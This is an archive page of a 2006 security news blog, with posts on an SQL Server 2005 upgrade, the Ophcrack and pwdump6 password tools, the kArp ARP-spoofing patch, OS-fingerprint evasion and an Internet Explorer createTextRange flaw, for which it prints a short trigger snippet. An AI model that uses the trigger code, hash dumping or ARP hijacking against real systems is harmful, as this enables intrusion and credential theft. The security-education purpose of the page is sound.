Darknet - The Darkside

Don`t Learn to HACK - Hack to LEARN. That`s our motto and we stick to it, we are all about Ethical Hacking, Penetration Testing & Computer Security. We share and comment on interesting infosec related news, tools and more. Follow us on Twitter, Facebook or RSS for the latest updates.

29 March 2006 | 8,875 views

My SQL2005 Diary – Part1

Prevent Network Security Leaks with Acunetix

At the place I pretend to work, the time has come that most developers equally fear and love, upgrade time. We’ve been using MSSQL2000 for 90% of our work for about 4 years now, and it’s served us well, but when a change as big as 2005 server comes along, you have to make the leap and upgrade. I suppose a little background is in order, but I’ll have to keep it fairly general as we have some strict rules on what we talk about with people outside the development team.

What we do now

The company I work for is a travel company, one of the big ones, and as with most big travel companies we do a huge variety of things. We own resorts, broker our own insurance, sell for third parties, sell our own holidays, own/rent cruise ships, provide resort management for small hotels, and many other things, all of which is managed through 3 internal sites. We handle the telephone auto-diallers in the call centre, stock-management at our red-sea resort, the links to the main UK flight database, the payment system, our SMS marketing servers, basically, everything.
We have 3 main centres, our corporate headquarters in America, the headquarters in the UK and 1 huge sales centre in the UK also. In addition to that we have either fixed line or internet linked terminals at all our resorts, most of the major airports, all of which connects to our headquarters in the UK(It’s an ex-cupboard upstairs). Because of the international nature of our business, and the resort links the sites must run with 100% uptime 24/7, even though they are all internal.

The sites run on a variety of different platforms, but the vast majority run on old style ASP and SQL server 2000, with a heavy focus on SQL server. To put the workload in perspective, our ASP apps use approximately 5% of our server’s total resources, with SQL server taking the other 95% and another magical 1% running Reporting Services (An excellent application if you’ve never used it). We have a multitude of databases, but we currently run on 4 SQL servers with the databases split as equally as we can get them to avoid having to deal with load balancing. The databases range greatly in size, from a few MB for the HR database, too over 50GB for the lead details database (Call centre data).

Why were upgrading

Due to the size and complexity of the database, performance is extremely important and we have our indexes and maintenance jobs tuned to absolute perfection or the entire thing would come crashing down around us, and we would have a lot of angry people looking to have our heads. But recently we have hit SQL server 2000’s “roof”, which is one of the reasons MSSQL has never challenged Oracle in the big enterprise market, and its proving a big problem for us. SQL server 7 was never meant to be an enterprise level database server, and in typical MS style a lot of SQL server 2000 has come from that original code, as have a lot of the problems, mainly its inability to handle truly massive database. 2005 fixes this.

SQL server 2000 was also limited in that it handled everything via transactions and locking, so if you want to retrieve data from the database in an editable format you have to basically lock that information so nobody else can access it. This can cause all kinds of problems, such as one user being told they can’t perform an action, because their locking themselves (Usually through bad coding) or a deadlock which is data being altered while they are waiting for a lock to end. 2005 borrows from Oracle in that is uses a combination of locking and versioning, which takes a copy of the data, performs the action on it and then puts it back into the database. This presents its own problems, but it does mean users can always get to their data.

There are also some significant coding changes, including some very cool stuff that is new to database servers as a whole. The ability to include code from other languages is one of the main talking points, which basically allows you to execute .net code within your stored procs. This may not sound so great, but you have to consider how it changes the way a DBA will work. At the moment database code needs to be specific, because speed is always an issue the server has to constantly optimize the way it works, and it can’t do this with vague and dynamic code. For example…

Select * from Invoice

Would bring back everything from the invoice table. But what if we just wanted a price field?

Select Invoice.Price From Invoice

That’s easy enough. But what if we wanted the gross price, for example, from insurance items, but the net price for everything else. We would do this(Pseudo-code);

Select (if Invoice.catagory = ‘INSURANCE’ then Invoice.Gross else Invoice.net end if) from Invoice

Again, it looks simple enough, but unfortunately the real code to do this is very complicated and grossly in-efficient at the moment, not to mention completely impossible in certain situations. In 2005 the method above would be perfectly legal, and using Microsoft’s CLR compiler to pre-compile the code, it’s considered adequate (It’s still not as good as plain SQL, but its good enough). This and the performance improvements in the new server would be enough to warrant an upgrade on their own.

What were doing next

We have setup 2 MSDN’d 2005 servers and mirrored our web server as a test bed for upgrading our code. Fortunately the vast majority of our code will still work, but to take advantage of the upgrades and new features we will have to re-write vast swathes of code. And all of our 500+ DTS’s and jobs will have to be completely re-written. And then comes the fun of learning an entirely new interpreter and compiler, and tuning it for maximum performance.

I’ll keep you updated



28 March 2006 | 136,922 views

Ophcrack 2.2 Password Cracker Released

Ophcrack is a Windows password cracker based on a time-memory trade-off using rainbow tables. This is a new variant of Hellman’s original trade-off, with better performance. It recovers 99.9% of alphanumeric passwords in seconds.

We mentioned it in our RainbowCrack and Rainbow Tables article.

Changes:

  • (feature) support of the new table set (alphanum + 33 special chars – WS-20k)
  • (feature) easier configuration for the table set (tables.cfg)
  • (feature) automatic definition of the number of tables to use at the same time (batch_tables) by queriying the system for the size of the memory
  • (feature) speed-up in tables reading
  • (feature) cleaning of the memory to make place for table readahead (linux version only)
  • (feature) improved installer for windows version
  • (fix) change of the default share for pwdump4 (ADMIN$)

Get it at http://sourceforge.net/projects/ophcrack

Digg This Article


27 March 2006 | 6,892 views

Information about the Internet Explorer Exploit createTextRange Code Execution

Internet Storm Center’s always informative Diary has some good information.

At the urging of Handler Extraordinaire Kyle Haugsness, I tested the sploit on a box with software-based DEP and DropMyRights… here are the results:

Software-based DEP protecting core Windows programs: sploit worked
Software-based DEP protecting all programs: sploit worked
DropMyRights, config’ed to allow IE to run (weakest form of DropMyRights protection): sploit worked
Active Scripting Disabled: sploit failed

So, go with the last one, if you are concerned. By the way, you should be concerned.

It didn’t take long for the exploits to appear for that IE vulnerability. One has been making the rounds that pops the calculator up (no, I’m not going to point you to the PoC code, it is easy enough to find if you read any of the standard mailing lists), but it is a relatively trivial mod to turn that into something more destructive. For that reason, SANS is raising Infocon to yellow for the next 24 hours.

Microsoft recommends you turn Active Scripting OFF to protect against this vulnerability.

Source: ISC

Yah I know, yet another reason to dump Internet Explorer and grab Firefox, not that anyone reading this site would be using Internet Exploder..

The code is along the lines of:

<code><input type=”checkbox” id=’c’>
<script>
r=document.getElementById(“c”);
a=r.createTextRange();
</script></code>

You can find the Bleeding Snort rule for the IE Exploit here.

Microsoft has now confirmed this.

“We’re still investigating, but we have confirmed this vulnerability and I am writing a Microsoft Security Advisory on this,” writes Lennart Wistrand, security program manager with the Microsoft Security Response Center, in a blog posting. “We will address it in a security update.”

There is also a 3rd party fix for this from eEye.


27 March 2006 | 8,306 views

Sealing Wafter – Defend Against OS Fingerprinting for OpenBSD

One way to defend against OS fingerprinting from tools such as nmap, queso, p0f, xprobe etc is to change the metrics that they base their analysis on.

One way to do this with OpenBSD is to use Sealing Wafter.

Goals of Sealing Wafter:
1. To reduce OS detection based on well known fingerprints network stack behavior.
2. To have the ability to load custom rules into the stack.
3. To unload, modify, reload the kernel module with on the fly rules. (great feature at packet parties)
4. To learn how the magic of tcpip stacks work.

What Sealing Wafter currently provides:
1. Hide from Nmap Syn/Xmas/Null scans, as well as the specific fingerprinting packets.
2. Ability to see what your stack is receiving without the need to drop your network device into promisc mode.
3. Complete control over rules that you can load on the fly todeal with specific incoming packets.
4. Initial support for several OS passive detection has been added for SYNs.

Weaknesses in current Sealing Wafter:
1. Full connection scans. e.g. nmap -sT will still find open ports. this is because I have yet to find anything that seperates a real tcp connection vs an nmap full connection. (most likely isn’t one.)
2. Can be very verbose when under heavy load. I have run this on my heaviest web servers, and have not noticed any major overhead.

Download the c code for the LKM here: Sealing Wafter


25 March 2006 | 155,706 views

Download youtube.com videos?

Ever wanted to download those cool videos from youtube.com? (Its an online video storage site similar to imageshack.us for storing images) and can’t because those peeps made it difficult for you to just download them offline? Well now you can !!

Go to fileleecher.com and follow the instructions on how to copy the youtube.com video link and download the video. Once you’ve download the video you’ll have to rename to .flv if doesn’t already have the extension. Then you’ll need to download the encoder to covert the .flv file format into other formats. For that you’ll need Riva FLV Encoder. The installation includes the player for FLV and the encoder for converting it to mpeg or avi.

After all that you can do what ever you want with the videos. Put it into your iPod video, PSP or even convert it to .3GP for putting it into your mobile phone.

Many thanks to CYBERAXIS SG for this site.

Digg This Article


25 March 2006 | 6,698 views

Spammer gets 8 years in Jail for Identity theft

Good I say, nothing worse than a spammer.

A bulk e-mailer who looted more than a billion records with personal information from a data warehouse has been sentenced to eight years in prison, federal prosecutors said Wednesday.

Scott Levine, 46, was sentenced by a federal judge in Little Rock, Ark., after being found guilty of breaking into Acxiom’s servers and downloading gigabytes of data in what the U.S. Justice Department calls one of the largest data heists to date. Acxiom, based in Little Rock, says it operates the world’s largest repository of consumer data, and counts major banks, credit card companies and the U.S. government among its customers.

In August 2005, a jury convicted Levine, a native of Boca Raton, Fla., and former chief executive of a bulk e-mail company called Snipermail.com, of 120 counts of unauthorized access to a computer connected to the Internet. The U.S. government says, however, there was no evidence that Levine used the data for identity fraud.

Looks like for some reason the FTP had access to the SAM file, or a copy of it, and this ‘hacker’ downloaded it then brute forced the hashes.

I wonder if he used RainbowCrack and Rainbow Tables?

If he read this site he might have done ;)

According to court documents, Levine and others broke into an Acxiom server used for file transfers and downloaded an encrypted password file called ftpsam.txt in early 2003. Then they ran a cracking utility on the ftpsam.txt file, prosecutors said, discovered 40 percent of the passwords, and used those accounts to download even more sensitive information.

Source: News.com


24 March 2006 | 7,143 views

Is Open Source Really More Secure?

Is Open Source more secure? That’s a question that can be answered with both yes and no. Not only that, but the reasons for the “yes” and the “no” are fairly much the same. Because you can see the source the task of hacking or exploiting it is made easier, but at the same time because its open, and more easily exploited the problems are more likely to be found.

When it comes to open source the hackers and crackers are doing us a favour, they find the problems and bring them to the attention of the world, where some bright spark will make a fix and let us all have that to. All well and good.

However I think this could also be a problem, because lets face it. Any monkey can download “free” software to use for this or that, with little or no idea how it actually works. They don’t check for fixes and updates, often believing “it will never happen to me”. In part this is because they just don’t see any reason for some one to hack them. But in the modern world where any script kiddie little git can download a virus construction kit, or a bot to run exploits on lists of servers its no longer a case of being targeted. They don’t care who you are, it’s the box they are after.

Recently a friend of mine suffered from this very problem, he didn’t believe he was worth the effort to hack. But simply by using an Open source web app he unwittingly made him self a target. Though a fix was available, he wasn’t aware of it. It was only when the host contacted him about problems that he even realised he’d been exploited.

With the growing popularity of the internet and open source solutions more and more unskilled users are installing software they don’t even understand. Even worse as any one application grows in popularity it grows as a worth while target for the low life script kiddies out there.

The problem has been exacerbated but the simple truth that with modern scripting languages such as PHP it is getting easier and easier to make some thing, being able to hack code together until it works might be fun, and you might make some thing that does the job, but its not a way to make safe secure software.

Most often exploits are based on stupid mistakes, errors that should have been found early on but weren’t because the code evolved, expanded and changed. No design, no planning, just code it until it works. This is the original meaning of “hacking”.

Now, with out mentioning names, I have pulled apart the code used in the CMS the friend I mention earlier used, and with out doubt I can say its poorly written. But it was free, so no one can complain.

I am sure there is some very good open source applications, linux, apache to name a few, but there is even more “open source” that’s just garbage. Just because its free doesn’t mean its good. Just because it popular doesn’t make it better. In fact as far as I can tell, if you want to use open source applications your probably better of choosing one no one else has really bothered with, that why your less likely to become a victim.

Closed source always has the advantage of being a little harder to find the problems, how ever, and this is important. It doesn’t mean its any better. As a friend of mine pointed out, Open source might be easier to hack in some ways, but because of that the problems come to light and generally are fixed quickly. Where as with a closed source application its actually in the interests of the authors to keep any problems hidden, if its not a common problem it may even go unfixed, because the author sees is as being unlikely any one else will ever find it. Or a fix will be bundled up with a later version and thus many people will never even know they could be at risk.

In the end I do believe open source is good for us all, but its important to check regularly for updates, patches and fixes. If you don’t, on your own head be it.


23 March 2006 | 9,026 views

kArp – Linux Kernel Level ARP Hijacking/Spoofing Utility

Introduction

kArp is a linux patch that allows one to implement ARP hijacking in the kernel, but control it easily via userland. You may configure, enable and disable kArp via ProcFS or the sysctl mechanism.

kArp is implemented almost on the device driver level. Any ethernet driver (including 802.11 drivers) is supported. The kArp code is lower than the actual ARP code in the network stack, and thus will respond to ARP requests faster than a normal machine running a normal network stack, even if the machine we’re spoofing has a CPU twice as fast as ours!

Functionality

  • ARP Hijacking – Enabling ARP spoofing allows a user to spoof an ARP response to a specific victim host. Due to the low level at which the code exists, our spoofed packet is guaranteed to arrive at the victim’s network stack prior to the response of the machine we’ve impersonated.
  • ARP Hijacking the Impersonated – Enabling this function via arp_send_to_spoofed allows us to spoof the victim’s information to the impersonated machine as well, helping to solidify the MiM attack. However, this functionality may kill the speed of our spoofed frame to the victim, so it isn’t enabled by default.
  • ARP Flooding – Enabling this function via arp_flood causes the kernel to send a flood of random source and destination MAC addresses via a broken ARP frame. On some switches this will fill its internal MAC table, or overflow it. Often, the result of this attack is forcing the switch to fall back to dumb hub mode, allowing us to sniff the wire without a MiM attack.

Warning

kArp was written to beat the race in responding to an ARP Request from a target (victim) machine. It is *not* meant as an tool to flood a victim with ARP information. This means that some operating systems (MacOSX) that ingest unsolicited ARP responses may still obtain the actual MAC address of the machine we’re impersonating. Linux, however, only accepts the fastest response. If you want to flood a machine with fake ARP responses, use a userland tool.

For now, the URL is:

http://aversion.net/~north/karp/


22 March 2006 | 6,050 views

Why Windows Vista ‘might’ Actually be Good

The main thing is the massive kernel overhaul, it’s actually adding some decent functionality and refining the architecture to become more like Linux!

While the kernel in Vista is still primarily the same one as in Windows 2000 and XP, there have been some significant changes to tighten up security. Fewer parts of the OS as a whole run in Kernel mode – most drivers run in User mode, for instance. Things that run in Kernel mode are prevented from installing without verified security certificates, and even then they require administrator-level user permission. In Vista, it should be much more difficult for unauthorized programs (like Viruses and Trojans) to affect the core of the OS and secretly harm your system

Yay, finally, an actual secure version of Windows? It’s about time right. But well what stops malware bundling itself with a pirated valid cerficate, there must be some offline procedure for people without full-time net connections.

We’ll have to see what this protection really offers, and how we can get around it :)

Also some heap performance improvements with controls to deal with heap fragmentation for large memory calls.

Some pretty advanced application ‘buffering’ too, not sure if I like this one (hopefully it can be turned off).

A key improvement to the root file system and memory management of Vista is a technology called SuperFetch. SuperFetch learns which applications and bits and pieces of the OS you use most and preloads them into memory, so you don’t have to wait for a bunch of hard drive paging before your apps or documents load. Microsoft has developed a pretty sophisticated prioritization scheme that can even differentiate which applications you are most likely to use at different times (on the weekend vs. during the week, or late at night vs. in the middle of the afternoon).

And well..networking? Does this finally mean THEY WROTE THEIR OWN TCP/IP STACK!?

Networking support has been extended throughout the lifetime of Windows 2000 and Windows XP, but it was getting harder and harder for Microsoft to keep improving the old code. So for Vista, they started over from ground zero and rewrote the networking stack from scratch. IPV6 was hacked onto Windows XP in a pretty basic way, but it is built directly into the Vista networking stack in a much more robust fashion.

Seems to have some fairly cool built in apps too and the new UI is very snazzy, perhaps a little too much eye-candy though, I don’t want to have to buy a Cray just to power the OS..

The browser will be running at a much reduced user level too (finally!) and it seems they are implementing proper user segregation by default (first time evar!).

I mean I never understood why they had ACL’s since WindowsNT but never setup or enforced segregation by default..like why can guest write to /windows/system and so on..

I’ll be looking out for it anyway, will you?

Source: Extremetech


21 March 2006 | 19,783 views

pwdump6 version 1.2 BETA Released

Version 1.2 (Beta) of the pwdump6 software has been released.

There are three major changes from the previous version:

  • Uses “random” named pipes (GUIDs) to allow concurrent copies of the client to run. This is predominately for the next version of fgdump, which will be multithreaded.
  • Will turn off password histories if the requisite APIs are not available (there are instances in which this is the case) – pwdump will no longer simply refuse to grab the hashes that it can.
  • Data is now encrypted over the named pipe using the Blowfish algorithm. More information on this is available on the website.

pwdump is a very useful tool for grabbing the password hashes directly from Windows (you do need Administrator access, so in some situations you need to escalate your priveleges first).

It is still useful though, as normally with Admin access on a Windows box you can’t get the SAM file as it’s locked by the OS, the only way normally is to boot using a Security LiveCD and save it to a USB drive or e-mail it to yourself.

You can grab the latest version of pwdump here.

Once you have the password hashes from the SAM file you can then crack them with your favourite password cracker (LCP, Cain & Abel etc), or even RainbowCrack and Rainbow Tables.

There is another version of pwdump called fgdump on the page which I might check out in the future.

Digg This Article